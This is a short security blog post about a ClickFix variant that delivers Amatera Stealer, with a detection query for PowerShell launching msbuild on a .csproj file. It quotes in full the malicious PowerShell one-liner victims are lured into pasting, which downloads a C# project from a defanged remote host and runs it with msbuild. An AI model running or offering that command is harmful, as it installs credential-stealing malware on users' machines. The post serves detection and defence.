172. Another Curious ClickFix PowerShell Command
Hello everyone!
I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste.
Proofpoint has published a report on Amatera Stealer, and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog:
powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"
The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe.
So, as always, we can use suspicious command line arguments for detection, for example:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: (*msbuild* AND *csproj*)
See you tomorrow!
Comments
Post a Comment